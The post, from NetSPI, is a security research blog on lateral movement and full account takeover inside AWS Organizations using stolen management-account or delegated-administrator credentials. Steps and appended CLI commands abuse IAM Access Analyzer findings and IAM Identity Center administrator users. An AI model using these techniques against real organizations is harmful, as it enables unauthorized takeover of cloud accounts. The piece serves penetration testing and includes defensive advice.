IAM Access Analyzer reviews the roles in an AWS account and tells you if any role trust relationships reach outside a “trust zone.” For example, if you have a role in an AWS account that allows any other AWS account to assume it, that role would get flagged as violating the trust zone since “any AWS account” is a much larger scope than a single AWS account. 

When integrated with AWS Organizations, the Access Analyzer associated trust zone (and as a byproduct, scan range) expands to the entire organization. By giving IAM Access Analyzer trusted access in Account A, we can let the Analyzer scan each member account in the organization and return a report that would include Account B’s vulnerable role.

Before we begin, let’s review each account’s IAM roles. Note we only have access to Account A info, but both role lists are provided here for transparency. Account B has the role with the trusted entity of * that we want to both discover and exploit as Account A.

Figures 10: Account A & Account B Starting IAM Roles Before Exploitation
Figures 10: Account A & Account B Starting IAM Roles Before Exploitation

Figures 10: Account A & Account B Starting IAM Roles Before Exploitation

As the attacker in Account A, navigate to “Services” in AWS Organizations and observe that the IAM Access Analyzer is disabled by default. While we could use the UI controls to enable the organization-integrated feature, we could also make use of the AWS Command Line Interface (CLI) using the leaked credentials.

Next, navigate to the IAM Access Analyzer feature within the IAM service and create an analyzer. Since Access Analyzer is now an enabled service, we can set the “Zone of trust” to the entire organization.

Figures 12: Creating an Access Analyzer

After a few minutes refresh the page and observe that the overly trusting role from Account B is listed as an active finding demonstrating an indirect avenue for collecting Account B data as an Account A entity.

Figure 13: Gathering Vulnerabilities in Account B as Account A
Figure 13: Gathering Vulnerabilities in Account B as Account A

To complete the POC, observe how the attacker in Account A can take the knowledge from the vulnerability scan (specifically the role ARN), and assume the role in Account B thus pivoting within the general organization.

Figure 14: Using Account A to AssumeRole RoleToListS3Stuff in Account B
Figure 14: Using Account A to AssumeRole RoleToListS3Stuff in Account B

While not critical to know for the attacker steps listed above, we can review both accounts again and note that a new service-created role was created and used in each member account per the organization-integrated feature: AWSServiceRoleForAccessAnalyzer.

Figures 15: Account A & Account B IAM Roles After Exploitation
Figures 15: Account A & Account B IAM Roles After Exploitation

Figures 15: Account A & Account B IAM Roles After Exploitation

Leveraging IAM Access Analyzer Through Delegated Administration

To demonstrate delegated administrator exploitation regarding Access Analyzer, we need to enable delegated administration in our current organization environment. To do so from Account A, navigate to Account A’s Access Analyzer feature, choose to add a delegated administrator, and enter Account C’s account number.

Figure 16: Using Account A to Make Account C a Delegated Administrator
Figure 16: Using Account A to Make Account C a Delegated Administrator

Assume that we have compromised credentials for Account C (as opposed to Account A). Also assume we have no starting knowledge regarding the organization. As Account C, we can navigate to the AWS Organizations service, and can conclude that we are probably a member account since the management account number does not match our compromised account number (under the Dashboard tab), and the general UI layout is not that of a management account.

However, unlike a default member account, the “AWS Accounts” tab now returns all AWS accounts in the organization instead of permission denied errors. Remember that one of the first things a delegated administrator gets is read-only rights to the organization. Thus, we can further hypothesize that we are not just a default member account, but a delegated administrator.

Figure 17: Viewing Organization Info as Account C
Figure 17: Viewing Organization Info as Account C

But delegated administrator for what? Since there is no centralized UI component in a member account that lists all the delegated services, we would need to browse to each organization-integrated feature in Account C (IAM Access Analyzer, S3 Storage Lens, etc.) where the UI will hopefully tell us if we are the delegated administrator for that feature.

This is very cumbersome, and we can leverage the CLI in the Appendix of this blog with our delegated administrator read-only rights to speed along the identification process as seen below. First, we call “list-delegated-administrators” to reconfirm our previous hypothesis that Account C is a delegated administrator. We can then list out all the delegated services in relation to ourselves by passing in our own account number to “list-delegated-services-for-account.” In this case, we can see that Access Analyzer is listed (access-analyzer.amazonaws.com) as the delegated service.

Figure 18: Listing Delegated Administrators & Delegated Services as Account C
Figure 18: Listing Delegated Administrators & Delegated Services as Account C

From here, finding the overly trusting role in Account B plays out much the same way as the trusted access example. We create an analyzer in Account C (now having the option to choose the entire organization due to the delegated administrator status), wait for the results, and identify the overly trusting role in Account B. Note that during setup, my first analyzer did not pick up the role immediately so deleting the old analyzer and making a new one seems to be a good debugging step. 

Figure 19: Gathering Vulnerabilities in Account B as Account C
Figure 19: Gathering Vulnerabilities in Account B as Account C

While the previous example started from the perspective of a compromised management account, delegated administrations show how a member account can still leverage organization-integrated features to access/analyze/change member accounts in the overall organization.

IAM Identity Center (Successor to SSO) – Complete Control/Movement over Member Account

IAM Identity Center can be thought of as another “easy win” where one can authenticate to any select member account allowing for full account takeover. While this does support delegated administration, we will just focus on trusted access. Once again, we will assume that you, as an attacker, have compromised credentials for Account A and are now in complete control of the management account.

Navigate to the IAM Identity Center service and choose to “Enable” it. This is the equivalent of enabling trusted access, and listing enabled services now returns IAM Identity Center as “sso.amazonaws.com”.

Figures 20: Enabling the IAM Identity Center Service

Glancing over IAM Identity Center, we can see AWS Organizations is embedded within the service under “AWS accounts”, and that we have the option to create users with associated permission sets. A user entity can be used to sign into the AWS access portal URL, and a permission set says what one can do in terms of IAM privileges. To get into any member account in AWS Organizations, we will create a user with a one-time password (OTP), create a permission set allowing access to all actions/resources, attach the user and permission set to target member account, and subsequently authenticate as the user to get access to the member account.

Figures 21: IAM Identity Center Dashboard
Figures 21: IAM Identity Center Dashboard

Create a user as shown below in Figure 22. Note we will choose the option to “generate a one-time password.” Instead of getting an OTP, we could also choose to send an email to create the user.

Figures 22: Creating a User Workflow
Figures 22: Creating a User Workflow
Figures 22: Creating a User Workflow

At the end of the user creation workflow, we are given an OTP and a Sign-In link. Note this access portal URL is the same URL displayed on the main dashboards page of IAM Identity Center.

Figures 23: Saving One-Time Password for New User
Figure 23: Saving One-Time Password for New User

Next, create a permission set. Think of permission sets as wrappers for IAM policies. We can wrap items like AWS-managed/customer-managed/inline IAM policies in each permission set via the “Custom permission set” workflow. For simplicity’s sake, we will just choose a “Predefined permission set” that already includes the equivalent of the AdministratorAccess policy. While these permission sets encapsulate IAM policies, they are not the same entity and have their own ARN format.

Figures 24: Creating Permission Set Workflow

Now that we have our user and permission set, we can set up a user to log into any member account in our organization displayed in the “AWS accounts” item in the lefthand navigation bar.

Figures 25: Attaching a User/Permission Set to Account Workflow

Now that the user is assigned to the member account, navigate to the sign in URL from earlier and enter the username/OTP combination following the login prompts.

Figures 26: Authenticate as User Workflow
Figures 26: Authenticate as User Workflow
Figures 26: Authenticate as User Workflow

Figures 26: Authenticate as User Workflow

Observe that post-authentication returns a portal with links for accessing the member AWS account via the UI or direct credentials. Clicking on the UI option takes us into the AWS console for Account C. In the UI we can see we are the user with the AdministratorAccess permission set. Thus, we have turned our account takeover of one AWS account into two AWS accounts. We could also have done the exact same vector of attack for Account B allowing for a complete takeover of every AWS account in the organization.

Figures 27: Sign into Member Account as AdministratorAccess User
Figures 27: Sign into Member Account as AdministratorAccess User

Figures 27: Sign into Member Account as AdministratorAccess User

It is worth mentioning that one can configure the service to automatically email OTPs upon user creation via the CLI if that is desired to avoid UI interaction. However, the act of turning on this setting still requires access to the UI making the leveraging UI elements an apparent necessity. After setting up automated email OTPs, you can create the user and permission set via CLI, and immediately try to sign in via the sign-in URL with the username (not the user’s email). An email is then sent that is associated with the username containing the OTP in the email.

Figures 28: Alternative Sign In Technique
Figures 28: Alternative Sign In Technique
Figures 28: Alternative Sign In Technique

Defense

The scenarios above started with the prerequisite that the management or member account credentials had been compromised. Thus, the pivoting techniques listed above do not represent an inherent flaw in AWS itself, but represent potential vectors of attack if certain access is gained through leaked credentials, internal threats, etc. Users can perform several actions to help defend against attacker movement in their organizations including:

  • Adhering to a principle of least privilege at the IAM level. Ideally users in the AWS environment should only have the permissions necessary to do their job. These granular controls mean If an account were compromised, the attacker might not be able to pivot any further into the environment.
  • Adhering to a principle of least privilege at the service level. Ensure that organization-integrated features with trusted access or delegated administration are needed and used. Leaving organization-integrated features enabled when not needed introduces an unnecessary blast radius.
  • Protect credentials, especially those for management accounts and delegated administrators. As seen above, these two positions grant access potentially to an entire organization, so the AWS keys should be protected and maintained.
  • Ensure proper logging infrastructure is set up so Organization actions are properly documented and monitored.

The following AWS articles provide guidance pertaining to the points discussed above. Or connect with NetSPI to learn how an AWS penetration test can help you uncover areas of misconfiguration or weakness in your AWS environment.

Conclusion

This article covers conceptual knowledge and demonstrates actual mechanisms for pivoting within an AWS Organization. Note that the article only covered IAM Access Analyzer and IAM Identity Center, but there are many other organization-integrated features. 

It is highly encouraged that if you are on an assessment without an easy AssumeRole into member accounts, and see an enabled organization feature, to review the specific feature documentation for possible pivoting techniques.

In the part two of this blog series, we will review one more organization-integrated feature, a recent Organization service update, and a tool I have created and pushed to Pacu to assist in enumerating all that was discussed above in one command.

Appendix: CLI Commands

Below is a summary of the important CLI commands that were used or leveraged through the UI. I have also included two examples of CLI workflows for Access Analyzer and Identity Center referenced above. As mentioned, Identity Center involves a mix of UI-only functionality and CLI commands unless the OTP email setting is otherwise configured by default.

# Base Organization Read APIs

aws organizations describe-organization
aws organizations list-roots
aws organizations list-accounts
aws organizations list-aws-service-access-for-organization
aws organizations list-delegated-administrators
aws organizations list-delegated-services-for-account --account-id [account number]
aws organizations list-organizational-units-for-parent –parent-id [OU/root ID]

#  Base Organization Mutate APIs

aws organizations enable-aws-service-access –service-principal [principal designated URL]
aws organizations register-delegated-administrator –account-id [account number] –service-principal [principal designated URL]

# Create Analyzer

└─$ aws accessanalyzer create-analyzer --analyzer-name "TestAnalyzer" --type "ORGANIZATION" --profile Orchestrator --region us-east-1
{
    "arn": "arn:aws:access-analyzer:us-east-1: [REDACTED]0:analyzer/TestAnalyzer"
}

# List Access Analyzer Findings

└─$ aws accessanalyzer list-findings --analyzer-arn "arn:aws:access-analyzer:us-east-1: [REDACTED]0:analyzer/TestAnalyzer" --profile Orchestrator --region us-east-1
{
    "findings": [
        {
            "id": "da8a421c-8d7f-47d7-b9aa-58ea3df45a6c",
            "principal": {
                "AWS": "*"
            },
            "action": [
                "sts:AssumeRole"
            ],
            "resource": "arn:aws:iam:: [REDACTED]6:role/RoleToListS3Stuff",
            "isPublic": true,
            "resourceType": "AWS::IAM::Role",
            "condition": {},
            "createdAt": "2022-12-21T04:29:13.377000+00:00",
            "analyzedAt": "2022-12-21T04:29:13.377000+00:00",
            "updatedAt": "2022-12-21T04:29:13.377000+00:00",
            "status": "ACTIVE",
            "resourceOwnerAccount": "579735764396"
        }
    ]
}

# Get Specific Analyzer Finding

└─$ aws accessanalyzer get-finding --analyzer-arn "arn:aws:access-analyzer:us-east-1: [REDACTED]0:analyzer/TestAnalyzer" --id "da8a421c-8d7f-47d7-b9aa-58ea3df45a6c" --profile Orchestrator --region us-east-1
{
    "finding": {
        "id": "da8a421c-8d7f-47d7-b9aa-58ea3df45a6c",
        "principal": {
            "AWS": "*"
        },
        "action": [
            "sts:AssumeRole"
        ],
        "resource": "arn:aws:iam::[REDACTED]6:role/RoleToListS3Stuff",
        "isPublic": true,
        "resourceType": "AWS::IAM::Role",
        "condition": {},
        "createdAt": "2022-12-21T04:29:13.377000+00:00",
        "analyzedAt": "2022-12-21T04:29:13.377000+00:00",
        "updatedAt": "2022-12-21T04:29:13.377000+00:00",
        "status": "ACTIVE",
        "resourceOwnerAccount": "579735764396"
    }
}

# IAM Access Analyzer Example Workflow

# Get instance ID

└─$ aws sso-admin list-instances --profile Orchestrator --region us-west-2
{
    "Instances": [
        {
            "InstanceArn": "arn:aws:sso:::instance/ssoins-7907a1fb914efa94",
            "IdentityStoreId": "d-92676f572a"
        }
    ]
}

# Create user. Note password is not returned via CLI and one needs to either get it from the UI via “Reset Password” on the new user or have the OTP auto-email setting configured.

└─$ aws identitystore create-user --profile Orchestrator --region us-west-2 --identity-store-id "d-92676f572a" --name "Formatted=FormattedValue,GivenName=GivenNameValue,FamilyName=FamilyNameValue" --user-name "Username" --display-name "TEST" --emails "Value=[REDACTED]@gmail.com,Type=Work,Primary=True"
{
    "UserId": "d81153b0-9051-709f-f49e-b6d9ec91f892",
    "IdentityStoreId": "d-92676f572a"
}

# Create Permission Set

└─$ aws sso-admin create-permission-set --name "PermissionSetOne" --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --session-duration "PT12H" --profile Orchestrator --region us-west-2
{
    "PermissionSet": {
        "Name": "PermissionSetOne",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "CreatedDate": "2022-12-18T19:51:37.664000-05:00",
        "SessionDuration": "PT12H"
    }
}
└─$ aws sso-admin attach-managed-policy-to-permission-set --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994" --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess" --profile Orchestrator --region us-west-2
{
    "PermissionSet": {
        "Name": "PermissionSetOne",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "CreatedDate": "2022-12-18T19:51:37.664000-05:00",
        "SessionDuration": "PT12H"
    }
}

# Attach permission set and user to account. Check status of provision.

└─$ aws sso-admin create-account-assignment --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --target-id "[REDACTED]6" --target-type "AWS_ACCOUNT" --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994" --principal-type "USER" --principal-id "d81153b0-9051-709f-f49e-b6d9ec91f892" --profile Orchestrator --region us-west-2
{
    "AccountAssignmentCreationStatus": {
        "Status": "IN_PROGRESS",
        "RequestId": "c6f6afee-efd2-4cad-a52e-58d937184b52",
        "TargetId": "[REDACTED]6",
        "TargetType": "AWS_ACCOUNT",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "PrincipalType": "USER",
        "PrincipalId": "d81153b0-9051-709f-f49e-b6d9ec91f892"
    }
}
└─$ aws sso-admin describe-account-assignment-creation-status --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --account-assignment-creation-request-id "c6f6afee-efd2-4cad-a52e-58d937184b52" --profile Orchestrator --region us-west-2
{
    "AccountAssignmentCreationStatus": {
        "Status": "SUCCEEDED",
        "RequestId": "c6f6afee-efd2-4cad-a52e-58d937184b52",
        "TargetId": "[REDACTED]6",
        "TargetType": "AWS_ACCOUNT",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "PrincipalType": "USER",
        "PrincipalId": "d81153b0-9051-709f-f49e-b6d9ec91f892",
        "CreatedDate": "2022-12-18T19:57:22.335000-05:00"
    }
}

The post Pivoting Clouds in AWS Organizations – Part 1: Leveraging Account Creation, Trusted Access, and Delegated Admin appeared first on NetSPI.

]]>